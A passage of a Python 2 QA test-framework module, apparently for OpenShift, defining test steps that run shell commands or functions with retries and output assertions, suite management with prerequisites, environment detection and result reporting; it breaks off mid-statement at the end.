\n def get_text(self, msg=None):\n if self.INTERACTIVE:\n return self._ui.get_text(msg)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n def get_value(self, prompt, default=None):\n if self.INTERACTIVE:\n return self._ui.get_input(prompt, default)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n def yes_no(self, prompt, default=True):\n if self.INTERACTIVE:\n return self._ui.yes_no()\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n def get_key(self, prompt=None, timeout=None, default=\"\"):\n if self.INTERACTIVE:\n return self._ui.get_key(prompt, timeout, default)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n def display(self, line):\n if self.INTERACTIVE:\n return self._ui.display(line)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n def Print(self, *args):\n if self.INTERACTIVE:\n return self._ui.Print(*args)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n # assertion methods make it convenient to check conditions.\n def assert_passed(self, arg, msg=None):\n if arg != PASSED:\n raise TestFailError, msg or \"Did not pass test.\"\n\n def assert_completed(self, arg, msg=None):\n if arg != COMPLETED:\n raise TestFailError, msg or \"Did not complete test.\"\n\n def assert_failed(self, arg, msg=None):\n if arg != FAILED:\n raise TestFailError, msg or \"Did not pass test.\"\n\n def assert_equal(self, arg1, arg2, msg=None):\n if arg1 != arg2:\n raise TestFailError, msg or \"%s != %s\" % (arg1, arg2)\n\n def assert_not_equal(self, arg1, arg2, msg=None):\n if arg1 == arg2:\n raise TestFailError, msg or \"%s == %s\" % (arg1, arg2)\n assert_notequal = assert_not_equal # alias\n\n def assert_true(self, arg, msg=None):\n if not arg:\n raise TestFailError, msg or \"%s not true.\" % (arg,)\n\n def assert_false(self, arg, msg=None):\n if arg:\n raise TestFailError, msg or \"%s not false.\" % (arg,)\n\n def assert_approximately_equal(self, arg1, arg2, fudge=None, msg=None):\n if fudge is None:\n fudge = arg1*0.05 # default 5% of arg1\n if abs(arg1-arg2) > fudge:\n raise TestFailError, msg or \"%s and %s not within %s units of each other.\" % (arg1, arg2, fudge)\n\n def assert_match(self, list_arg, arg, msg=None):\n if type(list_arg) == str:\n list_arg = [list_arg]\n for t in list_arg:\n if not re.search(r\"%s\"%t, arg):\n raise TestFailError, msg or \"Failed to match '%s' in given output.\" % (t)\n\n def assert_not_match(self, list_arg, arg, msg=None):\n if type(list_arg) == str:\n list_arg = [list_arg]\n for t in list_arg:\n if re.search(r\"%s\"%t, arg):\n raise TestFailError, msg or \"Should not match '%s' in given output.\" % (t)\n\n\n # some logical aliases\n fail_if_equal = assert_not_equal\n fail_if_not_equal = assert_equal\n assert_not_true = assert_false\n assert_not_false = assert_true\n\n def get_output_from_last_step(self):\n \"\"\"\n Returns the output from the previous step if there is any. \n \"\"\"\n if self._steps_output.has_key(len(self._steps_output)):\n return self._steps_output[len(self._steps_output)]\n else:\n return None\n\n def run_steps(self):\n self.__OUTPUT__ = [None] # first item should be empty, cause we count steps from 1\n self.__PARSED_VARS__ = {}\n i=1\n for step in self._steps:\n self.debug(\"*\"*80)\n self.debug(\"STEP[%s]: %s\"%(i, step.description))\n step._run() #in case of any problems it should raise exception \n #(e.g. TestFailError if fail) which will be handled by upper class (rhtest)\n step.step_id=i\n self.debug(\"STEP[%s] - DONE\"%i)\n self.debug(\"*\"*80)\n self._steps_output[i]=step.get_output()\n i=i+1\n\n return self.passed()\n\n def add_step(self, description, command, function_parameters=None, expect_description=\"\", expect_return=None, expect_str=None, expect_istr=None, unexpect_str=None, unexpect_istr=None, try_count=1, try_interval=5, output_filter=None, string_parameters=None):\n \"\"\"\n Support for old testcase.TestCaseStep functionality\n\n expect_str: (either string or list )\n \"expected string A\"\n or\n [\"expected string A\", \"expected string B\"]\n or\n \"/regular expression A/\"\n or\n [\"/regular expression A/\", \"regular expression B\"]\n or\n [\"expected string A\", \"regular expression B\"]\n\n - returns TestStep object\n \"\"\"\n self._steps.append(TestStep(self,\n description,\n command,\n function_parameters = function_parameters,\n expect_description = expect_description, \n expect_return = expect_return, \n expect_str = expect_str,\n expect_istr = expect_istr,\n unexpect_str = unexpect_str,\n unexpect_istr = unexpect_istr,\n string_parameters = string_parameters,\n try_interval = try_interval,\n try_count = try_count,\n output_filter = output_filter))\n\n return self._steps[len(self._steps)-1]\n\nclass RhTestLogger(object):\n \"\"\"\n\n \"\"\"\n _ui = None\n _report = None\n\n def __init__(self, ui, report):\n self._ui = ui\n self._report = report\n\n def info(self, msg):\n self._ui.info(msg)\n self._report.info(msg)\n\n def debug(self, msg):\n self._ui.diagnostic(msg)\n self._report.diagnostic(msg)\n\n def diagnostic(self, msg):\n self._ui.diagnostic(msg)\n self._report.diagnostic(msg)\n\n def error(self, msg):\n self._ui.error(msg)\n self._report.error(msg)\n\n\n\nclass TestStep(object):\n '''\n Step definition\n '''\n output = None\n retstatus = None\n function_parameters_kwargs = None\n\n def __init__(self, rhtest_obj, description, command, function_parameters=None, expect_description=\"\", expect_return=None, expect_str=None, unexpect_str=None, expect_istr=None, unexpect_istr=None, try_count=1, try_interval=5, output_filter=None, string_parameters=None):\n self.rhtest_obj = rhtest_obj\n self.info = rhtest_obj.info #let's use the same info fnuction as rhtest for logging\n self.debug = rhtest_obj.debug #let's use the same info fnuction as rhtest for logging\n self.error = rhtest_obj.error #let's use the same info fnuction as rhtest for logging\n self.description = description\n self.command = command\n\n self.function_kw_parameters = None\n if (isinstance(string_parameters, str)):\n self.string_parameters = [string_parameters]\n else:\n self.string_parameters = string_parameters\n if (isinstance(function_parameters,str)):\n self.function_parameters = [function_parameters]\n elif (isinstance(function_parameters, list)):\n self.function_parameters = function_parameters \n elif (isinstance(function_parameters, dict)): #only for functions\n self.function_kw_parameters = function_parameters \n self.function_parameters = None\n elif function_parameters is None:\n self.function_parameters = None\n else:\n raise TypeError(\"Invalid function_parameters - possible types=[None, str, list, dict]\")\n\n self.expect_description = expect_description\n self.expect_return = expect_return\n self.expect_str = expect_str\n self.unexpect_str = unexpect_str\n self.expect_istr = expect_istr\n self.unexpect_istr = unexpect_istr\n self.try_count = try_count\n self.try_interval = try_interval\n self.output_filter = output_filter\n\n def get_output(self):\n return self.output\n\n def get_retstatus(self):\n return self.retstatus\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Wrapper for _run() used by individual execution\n - returns (status, output)\n - throws exceptions only when this step requires checking (defined *expect_* parameters in add_step(*) method)\n \"\"\"\n if args is not None and len(args)>0:\n self.function_parameters = args #overwrite default function_parameters\n self.function_parameters_kwargs = kwargs #merge/overwrite default function_parameters\n self.debug(\"-\"*80)\n self.debug(\"STEP: %s\"%(self.description))\n self.debug(\"-\"*80)\n self._run()\n\n return (self.retstatus, self.output)\n\n def eval_parameters_list(self, parameters_list):\n self.debug('Eval parameters of string type...')\n temp = []\n if parameters_list is None:\n return\n for parameter in parameters_list:\n if isinstance(parameter, str):\n re_match_obj = re.match(r\"^__OUTPUT__(\\[[^\\[\\]]+\\])+$\", parameter)\n if re_match_obj != None:\n parameter = parameter.replace(\"__OUTPUT__\", \"self.rhtest_obj.__OUTPUT__\")\n parameter = eval(parameter)\n else:\n parameter = re.sub(r\"__OUTPUT__(\\[[^\\[\\]]+\\])+\", self.repl, parameter)\n #__PARSED_VARS__\n re_match_obj = re.match(r\"^__PARSED_VARS__(\\[[^\\[\\]]+\\])+$\", parameter)\n if re_match_obj != None:\n parameter = parameter.replace(\"__PARSED_VARS__\", \"self.rhtest_obj.__PARSED_VARS__\")\n parameter = eval(parameter)\n else:\n parameter = re.sub(r\"__PARSED_VARS__(\\[[^\\[\\]]+\\])+\", self.repl, parameter)\n else:\n pass\n temp.append(parameter)\n\n self.debug('Parameters after evaluation[1]: %s'%temp)\n return temp\n\n def repl(self, matchobj):\n if matchobj != None:\n self.debug('''Found '__OUTPUT__|__PARSED_VARS__' keyword, replace it''')\n #hack to avoid using global vars!\n s = matchobj.group(0).replace(\"__OUTPUT__\", \"self.rhtest_obj.__OUTPUT__\")\n s = s.replace(\"__PARSED_VARS__\",\"self.rhtest_obj.__PARSED_VARS__\")\n return eval(s)\n\n def eval_command_string(self, command_line):\n #self.debug('Evaluating command string...')\n cmd_after_eval = re.sub(r\"__OUTPUT__(\\[[^\\[\\]]+\\])+\", self.repl, command_line)\n cmd_after_eval = re.sub(r\"__PARSED_VARS__(\\[[^\\[\\]]+\\])+\", self.repl, cmd_after_eval)\n #self.debug('Command after evaluation: %s'%cmd_after_eval)\n return cmd_after_eval\n\n def _run(self):\n \"\"\"\n Executes the function or shell command.\n - returns nothing\n - used by Test.run_steps() - for internal calls \n - throws exceptions when expected conditions fail (expect_return, ...)\n \"\"\"\n if len(self.expect_description) > 0:\n self.debug(\"Expectation: %s\"%self.expect_description)\n #try to EVAL __OUTPUT__ and PARSED__VARS__\n try:\n self.function_parameters = self.eval_parameters_list(self.function_parameters)\n except Exception as e:\n self.error(str(e))\n raise e\n try:\n #\n # let's try to exec functions/closeures if present\n #\n if self.function_parameters is not None:\n executed = False\n l_params = []\n for p in self.function_parameters:\n if inspect.isfunction(p) or inspect.ismethod(p):\n self.debug(\"Found closure! Execute `%s' parameter as function.\"%p)\n res = p()\n l_params.append(res)\n executed = True\n else:\n l_params.append(p)\n\n self.function_parameters = l_params\n if executed:\n self.debug(\"Parameters after evaluation[2]: %s\"%self.function_parameters)\n except:\n self.debug(\"-\"*80)\n traceback.print_exc(file=sys.stderr)\n self.debug(\"-\"*80)\n raise TestIncompleteError(\"Unable to evaluate closures in %s\"%self.function_parameters)\n\n attempts = self.try_count\n if isinstance(self.command, str) or isinstance(self.command, unicode):\n\n if self.string_parameters:\n self.debug(\"String %s expansion...\")\n l_params = [] #for expansion\n for p in self.string_parameters:\n if inspect.isfunction(p):\n l_params.append(p())\n else:\n l_params.append(p)\n try:\n #make a quoted string\n #TODO: check what kind of quotes have been used and based on that make fixes\n l_params = \",\".join(map(lambda x: '\"'+x+'\"', l_params))\n self.debug(\"String expansion/array before: %s\"%l_params)\n str2exec = 'self.command=self.command%%(%s)'%l_params\n self.debug(\"String expansion/after: %s\"%str2exec)\n #and do the expansion...\n exec(str2exec)\n except Exception as e:\n self.error(\"Unable to expand command: %s\"%str(e))\n raise TestIncompleteError(\"Unable to string expansion in %s\"%self.function_parameters)\n\n try:\n self.command = self.eval_command_string(self.command)\n except Exception as e:\n self.error(\"Error during evaluating shell string\"%(str(e)))\n raise e\n\n self.debug(\"Executing SHELL: %s\"%self.command)\n\n while True:\n command = self.command\n self.debug(\"Attempt #%d\"%(self.try_count-attempts+1))\n if self.function_parameters is not None and len(self.function_parameters)>0:\n for a in self.function_parameters:\n command = command.replace(\"%s\", a, 1)\n (self.retstatus, self.output) = cmd_get_status_output(command)\n attempts -= 1\n if attempts == 0:\n break\n try:\n self._verify_step(dry=True)\n break\n except:\n pass\n time.sleep(self.try_interval)\n\n elif inspect.isfunction(self.command) or inspect.ismethod(self.command):\n self.debug(\"Executing FUNCTION: %s\"%self.command.__name__)\n while True:\n #TODO:start to intercept stdout/stderr\n self.debug(\"Attempt #%d\"%(self.try_count-attempts+1))\n if self.function_parameters is not None and self.function_parameters_kwargs is not None:\n self.retstatus = self.command(*self.function_parameters, **self.function_parameters_kwargs)\n elif self.function_parameters is not None:\n self.retstatus = self.command(*self.function_parameters)\n elif self.function_parameters_kwargs is not None:\n self.retstatus = self.command(**self.function_parameters_kwargs)\n else:\n self.retstatus = self.command()\n\n attempts -= 1\n if attempts == 0:\n break\n try:\n self._verify_step(dry=True)\n break\n except:\n pass\n time.sleep(self.try_interval)\n self.output = \"Fun_None_Output\" #we cannot capture output\n\n #TODO:stop of interception\n\n #append output into __OUTPUT__ for legacy support\n try:\n if self.output == \"Fun_None_Output\":\n if (self.output_filter):\n self.rhtest_obj.__OUTPUT__.append(self.filter_output(self.retstatus, self.output_filter))\n else:\n self.rhtest_obj.__OUTPUT__.append(self.retstatus)\n else:\n if (self.output_filter):\n self.rhtest_obj.__OUTPUT__.append(self.filter_output(self.output, self.output_filter))\n else:\n self.rhtest_obj.__OUTPUT__.append(self.output)\n except:\n pass\n self._verify_step(dry=False) #real verification...\n\n \n def _verify_step(self, dry=False):\n \"\"\"\n Throws exceptions if given conditions are not met with requirements\n \"\"\"\n #checking the return value\n if self.expect_return is not None:\n retstatus = self.retstatus\n # if it is array, let's check the first value...\n if isinstance(self.retstatus, list) or isinstance(self.retstatus, tuple):\n retstatus = self.retstatus[0]\n\n if isinstance(self.expect_return, list) or isinstance(self.expect_return, tuple):\n self.error(\"TODO: Not yet implemented\")\n #TODO\n\n if isinstance(self.expect_return, int): \n self.rhtest_obj.assert_equal(retstatus, \n self.expect_return, \n \"Expected return: %d, got %s\"%\n (self.expect_return, retstatus))\n elif isinstance(self.expect_return, unicode) or isinstance(self.expect_return, str): \n obj = re.search(r\"^!(\\d+)\",self.expect_return)\n if obj:\n self.rhtest_obj.assert_not_equal(int(retstatus), \n int(obj.group(1)), \n \"Expected return: %s, got %s\"%\n (self.expect_return, retstatus))\n else: #just compare two strings\n self.rhtest_obj.assert_equal(retstatus,\n self.expect_return, \n \"Expected return: %s, got %s\"%\n (self.expect_return, retstatus))\n else:\n self.error(\"Unknown `expect_return` type: %s\"%type(self.expect_return))\n else:\n self.debug(\"No checking of return value...\")\n\n if self.output is None:\n self.output = ''\n #checking the return value\n if self.expect_str:\n if self.output == \"Fun_None_Output\":\n print \"WARNING: Unable to check STDOUT from function call! Fix the script or ignore it if you do it intentionally.\"\n if isinstance(self.expect_str, str) or isinstance(self.expect_str, unicode):\n self.rhtest_obj.assert_match(self.expect_str, self.output, \"Unable to find `%s` string in the output.\"%self.expect_str)\n if isinstance(self.expect_str, list):\n for s in self.expect_str:\n self.rhtest_obj.assert_match(s, self.output, \"Unable to find `%s` string in the output.\"%s)\n\n if self.unexpect_str:\n if self.output == \"Fun_None_Output\":\n print \"WARNING: Unable to check STDOUT from function call! Fix the script or ignore it if you do it intentionally.\"\n if isinstance(self.unexpect_str, str) or isinstance(self.unexpect_str, unicode):\n self.rhtest_obj.assert_not_match(self.unexpect_str, self.output, \"Unexpected match of `%s` in output.\"%self.unexpect_str)\n if isinstance(self.unexpect_str, list):\n for s in self.unexpect_str:\n self.rhtest_obj.assert_not_match(s, self.output, \"Unexpected match of `%s` in output.\"%s)\n\n #if there is no verification, let's notify the user\n if sum(map(self.__dict__.has_key, ('expect_str',\n 'expect_istr',\n 'expect_return',\n 'unexpect_str',\n 'unexpect_istr'))) == 0:\n self.info(\"Nothing to verify in this step -> just executed\")\n self._nothing4checking = True\n\n\n def filter_output(self, output, filter_reg):\n if filter_reg != None:\n search_obj = re.search(r\"%s\" %(filter_reg), output, re.M)\n if search_obj != None:\n ret_output = search_obj.group(0)\n self.debug(\"According to output filter - [%s], return [%s]\" %(filter_reg, ret_output))\n else:\n ret_output = \"\"\n self.debug(\"According to output filter - [%s], return empty string\" %(filter_reg))\n else:\n ret_output = output\n return ret_output\n\n \n\nclass PreReq(object):\n \"\"\"A holder for test prerequiste.\"\"\"\n def __init__(self, name, *args, **kwargs):\n self.name = name\n self.args = args\n self.kwargs = kwargs\n\n def __repr__(self):\n return \"%s(%r, %r, %r)\" % (self.__class__.__name__, self.name, self.args, self.kwargs)\n\n def __str__(self):\n return repr_test(self.name, self.args, self.kwargs)\n\n\n# holds an instance of a Test class and the parameters it will be called with.\n# This actually calls the test, and stores the result value for later summary.\n# It also supports pre-requisite matching.\nclass _TestEntry(object):\n def __init__(self, inst, args=None, kwargs=None):\n self.inst = inst\n self.args = args or ()\n self.kwargs = kwargs or {}\n self.result = None\n\n def __call__(self):\n try:\n self.result = apply(self.inst, self.args, self.kwargs)\n except KeyboardInterrupt:\n self.result = ABORT\n raise\n return self.result\n\n def __eq__(self, other):\n return self.inst == other.inst\n\n def matches(self, name, args, kwargs):\n return (name, args, kwargs) == (self.inst._testname, self.args, self.kwargs)\n\n def match_prerequisite(self, prereq):\n \"Does this test match the specified prerequisite?\"\n return (self.inst._testname, self.args, self.kwargs) == (prereq.name, prereq.args, prereq.kwargs)\n\n def get_result(self):\n return self.result\n\n def prerequisites(self):\n return self.inst.prerequisites()\n\n def abort(self):\n self.result = self.inst.abort(\"Abort forced by suite runner.\")\n return self.result\n\n def was_aborted(self):\n return self.result == ABORT\n\n def name(self):\n return self.inst._testname\n\n def get_values(self):\n return self.inst._testname, self.args, self.kwargs, self.result\n\n def __repr__(self):\n return repr_test(self.inst._testname, self.args, self.kwargs)\n\nclass _SuiteEntry(_TestEntry):\n def get_result(self):\n # self.result is a list in this case\n self.results = self.inst.results()\n for res in self.results:\n if res != PASSED:\n return res\n return PASSED\n\ndef repr_test(name, args, kwargs):\n args_s = IF(args, \n IF(kwargs, \"%s, \", \"%s\") % \", \".join(map(repr, args)),\n \"\")\n kws = \", \".join(map(lambda it: \"%s=%r\" % (it[0], it[1]), kwargs.items()))\n return \"%s()(%s%s)\" % (name, args_s, kws)\n\n\nclass TestSuite(object):\n \"\"\"TestSuite(config)\n A TestSuite contains a set of test cases (subclasses of Test class objects)\n that are run sequentially, in the order added. It monitors abort status of each\n test, and aborts the suite if required. \n\n To run it, create a TestSuite object (or a subclass with some methods\n overridden), add tests with the 'add_test()' method, and then call the\n instance. The 'initialize()' method will be run with the arguments given when\n called.\n\n \"\"\"\n def __init__(self, cf, nested=0):\n self.config = cf\n self.report = cf.report\n self._debug = cf.options.DEBUG\n self._verbose = cf.options.VERBOSE\n self._tests = []\n self._nested = nested\n self.suite_name = self.__class__.__name__\n self._testbed_needed = None\n \n def __iter__(self):\n return iter(self._tests)\n\n def set_config(self, cf):\n self.config = cf\n\n def add_test(self, _testclass, *args, **kw):\n \"\"\"add_test(Test, [args], [kwargs])\n Appends a test object in this suite. The test's test_method() will be called\n with the arguments supplied here. If the test case has a prerequisite defined\n it is checked for existence in the suite, and an exception is raised if it is\n not found.\"\"\"\n if _testclass.INTERACTIVE and self.config.flags.NOINTERACTIVE:\n print >>sys.stderr, \"%s is an interactive test and NOINTERACTIVE is set. Skipping.\" % (_testclass.__name__,)\n return\n testinstance = _testclass(self.config)\n entry = _TestEntry(testinstance, args, kw)\n self._verify_new(entry)\n self._tests.append(entry)\n\n def _verify_new(self, entry):\n prereqs = entry.prerequisites()\n count = 0\n for prereq in entry.prerequisites():\n for te in self._tests:\n if te.match_prerequisite(prereq):\n count += 1\n if count < len(prereqs):\n raise TestSuiteAbort, \"unable to add test case %s, prerequisite not already added!\" % (entry, )\n\n def add_suite(self, suite, *args, **kw):\n \"\"\"add_suite(TestSuite, [args], [kwargs])\n Appends an embedded test suite in this suite. \"\"\"\n if type(suite) is type(Test): # class type\n suite = suite(self.config, 1)\n else:\n suite.config = self.config\n suite._nested = 1\n self._tests.append(_SuiteEntry(suite, args, kw))\n suite.test_name = \"%s%s\" % (suite.__class__.__name__,len(self._tests)-1)\n return suite\n\n def add(self, klass, *args, **kw):\n \"\"\"add(classobj, [args], [kwargs])\n Most general method to add test case classes or other test suites.\"\"\"\n if issubclass(klass, Test):\n self.add_test(klass, *args, **kwargs)\n elif issubclass(klass, TestSuite):\n self.add_suite(klass, *args, **kwargs)\n else:\n raise ValueError, \"TestSuite.add: invalid class type.\"\n\n def get_tests(self):\n \"\"\"Return a list of the test objects currrently in this suite.\"\"\"\n return self._tests[:]\n\n def get_test(self, name, *args, **kwargs):\n for entry in self._tests:\n if entry.matches(name, args, kwargs):\n return entry\n return None\n\n def info(self, msg):\n \"\"\"info(msg)\n Put in informational message in the test report.\"\"\"\n self.config.userinterface.info(msg)\n self.report.info(msg)\n\n def error(self, msg):\n self.config.userinterface.error(\"ERROR: %s\" % msg)\n self.report.add_message(\"ERROR\", msg)\n\n def prerequisites(self):\n \"\"\"Get the list of prerequisites, which could be empty. Primarily\n used by nested suites.\"\"\"\n return getattr(self, \"PREREQISITES\", [])\n \n\n # this is the primary way to invoke a suite of tests. call the instance.\n # Any supplied parameters are passed onto the suite's initialize()\n # method.\n def __call__(self, *args, **kwargs):\n try:\n self._initialize(args, kwargs)\n rv = self.run_tests()\n except TestSuiteWaived, rv:\n #nasty hack to update TCMS if exception occurs in Suite()\n #TODO: implement update_testcaserun() in TestSuite() scope !!!\n try:\n self._tests[0].inst.update_testcaserun('WAIVED')\n except:\n pass\n self.error(\"Suite waived: %s\" % (rv,))\n rv = WAIVED\n except TestSuiteAbort, rv:\n #nasty hack to update TCMS if exception occurs in Suite()\n #TODO: implement update_testcaserun() in TestSuite() scope !!!\n try:\n self._tests[0].inst.update_testcaserun()\n except:\n pass\n self.error(\"Suite aborted: %s\" % (rv,))\n traceback.print_exc(file=sys.stderr)\n rv = INCOMPLETE\n except Exception, rv:\n #if 1:\n # ex, val, tb = sys.exc_info()\n # debugger.post_mortem(ex, val, tb)\n #nasty hack to update TCMS if exception occurs in Suite()\n #TODO: implement update_testcaserun() in TestSuite() scope !!!\n try:\n self._tests[0].inst.update_testcaserun()\n except:\n pass\n self.error(\"General Exception - aborted: %s\" % (rv,))\n traceback.print_exc(file=sys.stderr)\n rv = INCOMPLETE\n finally:\n pass #self._finalize()\n # do finalize() regardless\n self._finalize()\n return rv\n #return PASSED # suite ran without exception...\n\n\n def _initialize(self, args, kwargs):\n \"\"\" TestSuite \"\"\"\n self.report.add_heading(\"Test suite: %s\" % self.__class__.__name__, 1)\n #setup the run_mode\n if self.config.instance_info['ip'] == 'int.openshift.redhat.com':\n self.config.options.run_mode = 'INT'\n elif self.config.instance_info['ip'] == 'stg.openshift.redhat.com':\n self.config.options.run_mode = 'STG'\n elif self.config.instance_info['ip'] == 'openshift.redhat.com':\n self.config.options.run_mode = 'PROD'\n elif self.config.instance_info['ip'].find(\"example.com\") != -1 or self.config.instance_info['ip'].find(\"test.com\") != -1 or self.config.instance_info['ip'].find(\"broker\") != -1: \n self.config.options.run_mode = 'OnPremise'\n else: \n self.config.options.run_mode = 'DEV'\n\n self.verify_testbed()\n #if self._testbed_needed:\n # self.report.add_message(\"TESTBED\", self.config.testbed.name)\n # initialize the suite\n try:\n rv = self.initialize(*args, **kwargs)\n except KeyboardInterrupt:\n self.info(\"Suite aborted by user in initialize().\")\n raise TestSuiteAbort\n except:\n ex, val, tb = sys.exc_info()\n if self._debug:\n ex, val, tb = sys.exc_info()\n debugger.post_mortem(ex, val, tb)\n self.error(\"Suite failed to initialize: %s (%s)\" % (ex, val))\n raise TestSuiteAbort, val\n # run all the tests\n\n # verify any prerequisites are met at run time. Note that this\n # currently only checks this particular suite.\n def check_prerequisites(self, currententry, upto):\n for prereq in currententry.prerequisites():\n for entry in self._tests[:upto]:\n if entry.match_prerequisite(prereq):\n if entry.result == PASSED:\n continue\n else:\n self.report.add_heading(repr(currententry), 2)\n self.info(\"WARNING: prerequisite of %s did not pass.\" % (currententry,))\n self.info(\"%s: %s\" % (prereq, entry.result))\n currententry.abort()\n return False\n return True # no prerequisite\n \n def testbed_will_work(self, itest):\n \"\"\"\n check if the ITEST directive matches the ip. \n for PROD only ip that contains openshift.redhat.com will work\n for STG: only ip that contains stg.openshift.redhat.com will work\n \"\"\"\n if itest == None:\n raise Exception(\"Unable to check testbed. ITEST property is not defined.\")\n\n tb_will_work = False\n env_list = []\n if isinstance(itest,str):\n env_list.append(itest)\n elif isinstance(itest,list):\n env_list = itest\n else:\n raise Exception(\"Unknown ITEST type. Only str|list types are supported.\")\n \n for env_type in env_list:\n if env_type:\n if env_type == 'PROD':\n if 'openshift.redhat.com' in self.config.instance_info['ip']:\n tb_will_work = True\n break\n elif env_type == 'INT':\n if 'int.openshift.redhat.com' in self.config.instance_info['ip']:\n tb_will_work = True\n break\n elif env_type == 'STG':\n if 'stg.openshift.redhat.com' in self.config.instance_info['ip']:\n tb_will_work = True\n break\n elif env_type == 'DEV':\n if self.config.instance_info['ip'] not in ('stg.openshift.redhat.com', 'int.openshift.redhat.com','openshift.redhat.com' ):\n tb_will_work = True\n break\n elif env_type is None:\n tb_will_work = True\n break\n\n return tb_will_work\n\n def verify_testbed(self):\n for entry in self._tests:\n if entry.inst.ITEST and not self.testbed_will_work(entry.inst.ITEST):\n reason = \"Test can't run in this environment\"\n raise TestSuiteWaived, \"Cannot use testbed %s: %s\" % (entry.inst.ITEST, reason)\n\n def run_tests(self):\n rv = PASSED\n for i, entry in enumerate(self._tests):\n if not self.check_prerequisites(entry, i):\n continue\n try:\n # XXX put back later\n #self.config.logfile.note(\"%s: %r\" % (timelib.localtimestamp(), entry))\n \"\"\"\n print entry.args, len(entry.args)\n if len(entry.args) > 0:\n self.config.tc_args = eval(entry.args[0])\n else:\n self.config.tc_args = {}\n \"\"\"\n rv = entry()\n except KeyboardInterrupt:\n self.info(\"Test suite aborted by user.\")\n rv = ABORT\n if self._nested:\n raise TestSuiteAbort, \"aborted by user\"\n else:\n break\n except TestSuiteAbort, err:\n self.info(\"Suite aborted by test %s (%s).\" % (entry.name(), err))\n rv = ABORT\n # this should only happen with incorrectly written test_method().\n if rv is None:\n self.report.diagnostic(\"warning: test returned None, assuming failed. Please fix the %s.test_method()\" % (entry.name()))\n rv = FAILED\n # keep return value in results\n # check for abort condition and abort if so\n if rv == ABORT:\n break\n if self.config.options.TCMS:\n # mark test suite as finish and add the total time\n testrun_id = self.config.testrun_res[0]['run_id']\n tcms = self.config.tcms_obj\n params = {'status': 1, 'estimated_time': self.config.total_time }\n tcms.update_testrun(testrun_id, params),\n\n return rv\n\n def _finalize(self):\n # finalize the suite\n try:\n self.finalize()\n except KeyboardInterrupt:\n if self._nested:\n raise TestSuiteAbort, \"Suite '%s' aborted by user in finalize().\" % (self.suite_name,)\n else:\n self.info(\"Suite aborted by user in finalize().\")\n except:\n ex, val, tb = sys.exc_info()\n if self._debug:\n debugger.post_mortem(ex, val, tb)\n self.info(\"Suite failed to finalize: %s (%s)\" % (ex, val))\n if self._nested:\n raise TestSuiteAbort, \"subordinate suite '%s' failed to finalize.\" % (self._tests[self._testname],)\n self._report_summary()\n\n def _report_summary(self):\n ui = self.config.userinterface\n self.report.add_heading(\"Summarized results for %s.\" % self.__class__.__name__, 2)\n ui.Print(\"Summarized results for %s.\" % self.__class__.__name__)\n \n msg = []\n for entry in self._tests:\n res = entry.get_result()\n if res == PASSED:\n msg.append(\"%50s: PASSED\" % (entry,))\n ui.printf(\"%50s: %%GPASSED%%N\" % (entry,))\n elif res == FAILED:\n msg.append(\"%50s: FAILED\" % (entry,))\n ui.printf(\"%50s: %%RFAILED%%N\" % (entry,))\n elif res == INCOMPLETE:\n msg.append(\"%50s: INCOMPLETE\" % (entry,))\n ui.printf(\"%50s: %%YINCOMPLETE%%N\" % (entry,))\n elif res == COMPLETED:\n msg.append(\"%50s: COMPLETED\" % (entry,))\n ui.printf(\"%50s: %%GCOMPLETED%%N\" % (entry,))\n elif res == ABORT:\n msg.append(\"%50s: ABORTED\" % (entry,))\n ui.printf(\"%50s: %%yABORTED%%N\" % (entry,))\n elif res is None:\n pass # test case did not run\n else:\n msg.append(\"%50s: strange test result value of: %s\" % (entry, res))\n msg.append(\"%50s %.2f seconds\" % ('SUITETIME:', self.config.total_time))\n msg.append(\"\\n\")\n ui.printf(\"%50s %.2f seconds\" % ('SUITETIME:', self.config.total_time))\n self.report.add_summary(\"\\n\".join(msg))\n\n def results(self):\n return map(lambda t: t.get_result(), self._tests)\n\n def __str__(self):\n s = [\"Tests in suite:\"]\n s.extend(map(str, self._tests))\n return \"\\n\".join(s)\n\n ### overrideable interface.\n def initialize(self, *args):\n \"\"\"Override this if you need to do some initialization just before the\nsuite is run. \"\"\" \n pass\n\n def finalize(self, *args):\n \"\"\"Override this if you need to do some clean-up after the suite is run.\"\"\"\n try:\n if self.config.tcms_testcaserun_id is not None:\n sys.stdout.flush()\n sys.stderr.flush()\n time.sleep(2) #we need a time to flush the buffers for tee from launcher.py?\n f = open(\"%s/curr_tc_log.%s\"%(get_tmp_dir(), self.config.tcms_testcaserun_id), 'r')\n log = f.read()\n self.info(\"<html>%s</html>\" % log)\n f.close()\n else:\n self.info('Run manually - not by launcher.py => the stderr/stdout will not be included into the report.')\n except:\n pass\n\n#######################\n# helper functions\n#######################\n\ndef underscore_to_camelcase(word):\n return ''.join(x.capitalize() or '_' for x in word.split('_'))\n \ndef convert_script_to_cls(name):\n \"\"\"\n convert a test script name as stored in TCMS and convert it into a class\n that can be added by add_test()\n XXX: due to inconsistent naming conventions between filename \n for example: quick_start_redmine.py vs the class name defined in the \n testscript itself QuickStartRedmine\n we need to either have a naming convention in place and fix the exisiting\n scripts. This function will help to guess the class name to import\n \"\"\"\n mod = __import__(name)\n components = name.split('.')\n for comp in components[1:]:\n mod_list = dir(mod)\n cls_name = underscore_to_camelcase(comp)\n mod = getattr(mod, comp)\n \n cls_list = dir (mod)\n try:\n klass = getattr(mod, cls_name)\n except:\n # crude hack.\n klass = getattr(mod, cls_list[0])\n return klass\n\n#######################\n# helper functions\n#######################\n\ndef extract_tests_from_json_file(json_file):\n \"\"\"\n \n \"\"\"\n import json\n tests = []\n json_text = open(json_file, 'r')\n json_data = json.load(json_text)\n for data in json_data:\n converted_name = data['script'].replace(\"/\", '.').split('.py')[0]\n args = data['arguments']\n tests.append((converted_name, args))\n \"\"\"\n if data['arguments']:\n testcase_variants = eval(data['arguments']).__getitem__('variants')\n testcase_arg_dict[data['case_id']] = testcase_variants\n \"\"\"\n return (tests)\n\n\n# A test module may use \"from qatest import *\" and get these default\n# initialize/finalize functions. These are run as module-level initialize and\n# finalize by the testrunner module.\n\ndef initialize(conf):\n pass\n\ndef finalize(conf):\n pass\n\nif __name__ == \"__main__\":\n #os.system(\"qaunittest test_stratatest\")\n #val = underscore_to_camelcase('sending_email')\n val = 